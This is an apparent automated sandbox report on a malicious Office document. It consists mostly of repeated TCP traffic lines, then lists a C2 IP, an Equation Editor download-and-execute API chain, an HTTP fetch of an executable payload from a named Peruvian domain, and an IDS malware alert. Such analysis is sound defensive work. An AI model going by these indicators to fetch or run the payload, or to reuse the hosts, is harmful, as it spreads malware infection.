              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorIPs: 192.210.150.26
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C03D5 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035C03D5
              Source: Joe Sandbox ViewIP Address: 192.210.150.26 192.210.150.26
              Source: Joe Sandbox ViewASN Name: RedCientificaPeruanaPE RedCientificaPeruanaPE
              Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
              Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
              Source: Network trafficSuricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficHTTP traffic detected: GET /HKP098767890HJ.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.grupodulcemar.peConnection: Keep-Alive
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C03D5 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035C03D5
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A338A6AB.emfJump to behavior
              Source: global trafficHTTP traffic detected: GET /HKP098767890HJ.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.grupodulcemar.peConnection: Keep-Alive
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: www.grupodulcemar.pe
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
